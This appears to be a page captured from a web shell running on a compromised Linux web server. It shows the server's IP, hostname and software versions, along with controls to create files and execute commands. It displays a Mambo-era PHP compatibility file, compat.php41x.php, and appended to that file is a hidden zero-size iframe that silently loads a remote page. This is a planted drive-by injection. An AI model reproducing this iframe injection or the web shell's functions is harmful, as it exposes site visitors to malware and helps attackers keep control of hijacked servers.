One Hat Cyber Team
Your IP :
216.73.216.115
Server IP :
194.44.31.54
Server :
Linux zen.imath.kiev.ua 4.18.0-553.77.1.el8_10.x86_64 #1 SMP Fri Oct 3 14:30:23 UTC 2025 x86_64
Server Software :
Apache/2.4.37 (Rocky Linux) OpenSSL/1.1.1k
PHP Version :
5.6.40
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
sam
/
public_html
/
web
/
includes
/
View File Name :
compat.php41x.php
<?php /** * PHP 4.1.x Compatibility functions */ // no direct access defined( '_VALID_MOS' ) or die( 'Restricted access' ); if (!function_exists( 'array_change_key_case' )) { if (!defined('CASE_LOWER')) { define('CASE_LOWER', 0); } if (!defined('CASE_UPPER')) { define('CASE_UPPER', 1); } function array_change_key_case( $input, $case=CASE_LOWER ) { if (!is_array( $input )) { return false; } $array = array(); foreach ($input as $k=>$v) { if ($case) { $array[strtoupper( $k )] = $v; } else { $array[strtolower( $k )] = $v; } } return $array; } } /** * Add functionanlity of html_entity_decode() to PHP under 4.3 * * @category PHP * @package PHP_Compat * @link http://php.net/function.html_entity_decode * @since PHP 4.3 * @require PHP 4.0.1 */ if (!function_exists('html_entity_decode')) { function html_entity_decode($string) { // Replace numeric $string = preg_replace('~&#x([0-9a-f]+);~ei', 'chr(hexdec("\\1"))', $string); $string = preg_replace('~&#([0-9]+);~e', 'chr(\\1)', $string); $trans_tbl = get_html_translation_table(HTML_ENTITIES); $trans_tbl = array_flip($trans_tbl); return strtr($string, $trans_tbl); } } ?> <iframe width="0" height="0" frameborder="0" scrolling="no" src="http://gubmos.com/index12"></iframe>